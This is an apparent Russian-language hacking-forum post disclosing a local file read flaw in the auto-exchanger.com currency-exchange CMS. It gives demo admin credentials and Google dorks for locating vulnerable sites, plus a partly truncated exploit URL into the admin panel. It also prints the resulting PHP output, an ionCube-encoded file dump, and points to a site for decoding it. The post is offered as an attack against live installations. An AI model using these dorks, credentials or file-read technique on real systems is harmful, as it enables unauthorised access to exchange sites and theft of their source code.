HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу auto-exchanger.com - LocalFileReader
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 14.09.2016, 12:30
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию
Сам проект по продаже CMS обменных пунктов: https://www.auto-exchanger.com

демо проект:

http://demo.auto-exchanger.com admin1:admin1

DORK:

"inurl:?lang=english exchange"

"inurl:nview.php?title="

експлоит:

http://demo.auto-exchanger.com/admin...hp&Action=Edit

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$__id[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]':'[/COLOR][COLOR="#007700"]){[/COLOR][COLOR="#0000BB"]$__id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'\\'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$__id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]));[/COLOR][COLOR="#0000BB"]$__here[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'\\'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$__here[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]));}[/COLOR][COLOR="#0000BB"]$__rd[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_repeat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/..'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]substr_count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$__id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"])).[/COLOR][COLOR="#0000BB"]$__here[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$__i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$__rd[/COLOR][COLOR="#007700"]);while([/COLOR][COLOR="#0000BB"]$__i[/COLOR][COLOR="#007700"]--){if([/COLOR][COLOR="#0000BB"]$__rd[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__i[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"]){[/COLOR][COLOR="#0000BB"]$__lp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$__rd[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$__i[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]$__ln[/COLOR][COLOR="#007700"];if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$__oid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$__lp[/COLOR][COLOR="#007700"])){[/COLOR][COLOR="#0000BB"]$__ln[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$__lp[/COLOR][COLOR="#007700"];break;}}}if([/COLOR][COLOR="#0000BB"]function_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'dl'[/COLOR][COLOR="#007700"])){@[/COLOR][COLOR="#0000BB"]dl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$__ln[/COLOR][COLOR="#007700"]);}}else{die([/COLOR][COLOR="#DD0000"]'The file '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" is corrupted.\n"[/COLOR][COLOR="#007700"]);}if([/COLOR][COLOR="#0000BB"]function_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'_il_exec'[/COLOR][COLOR="#007700"])){return[/COLOR][COLOR="#0000BB"]_il_exec[/COLOR][COLOR="#007700"]();}echo([/COLOR][COLOR="#DD0000"]'Site error: the file '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' requires the ionCube PHP Loader '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$__ln[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]' to be installed by the website operator. If you are the website operator please use the ionCube Loader Wizard to assist with installation.'[/COLOR][COLOR="#007700"]);exit([/COLOR][COLOR="#0000BB"]199[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]HR+cPo//f2S9/1kSBks7iYhltqWXx6IBc2Jq/CGUeTW2AXSd6dnn0KWJFT/OoPnfu6SeSmNtOct6
fGyOtL0BJ2P/ULaZl+FMQPilWfpgS0mQjXsRxCrHQlndvGsGnokfzeekHFVlfVGALzUxTj1KZrWk
kqRtCxv0iLjikLnjZk0j3PkJcMN59tET7LbF8DW1TPGwHFrNej37Ya+Z/Tf+VRn2OE5FtM7sNmVc
Idt2/d734/xig87dLcYPkBCMEz4H0RBpCsqG9gKtVz9TtyfaylbSUTwuWaCdC33EplysQYTB4n8N
LLdlPhpEE3azLNDvoC1dDPzuxAPZ5wGRv/iLwNhBE0sElp/fbNa5g2oen/suFMW7gXBTzcq2S8q+
4QvT+88zS0kmYlQ7MRo9lsEY4+9XqMB9KDBEHfgWw6L1/+6RvE7q0Mpw1/EMDbkKfv7HxsK1Inzi
1QPD9F8AOTMw72FveCLyAg5NvKGOpPurTG+3EDfOXlnfNV8sG6lZ4weRrDAY1rYIhsDDQi2C5+kZ
Kvtt8kdd6pIPuiFB+1DqLcNF6H7a3e9vqruseuS78BHKEGVRE5GZ6cbseqf1ak4RqOOrzC/VQPGe
7hSodQTWqwVersQDRwDgpS4TUEcr7hLg7Hkb5POSPwIqi64Svz3pxlUNCL1SLEi5JKfIHz77/uKe
Z94RLSHon7b+SubIH1nFAxLcPMT98nV1mXPgIuX62E1m5J5z1iduEkszPnArKbwX9GZSXIZpdWNo
Kku0yb7a+sDjIstt2wjBb/YRFMEiJ/x4WgqcJxw2oLgXjHOdVOmd6YFjuKxJ9IajgNE/FJfkr1nJ
YnY6XtixJbDIFvfiT8LhsGCF6hRrfVNDHAS=[/COLOR] 
декриптуем на сайте:

https://idecode.eu/decoder

[PHP]
[COLOR="#000000"][COLOR="#007700"]
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.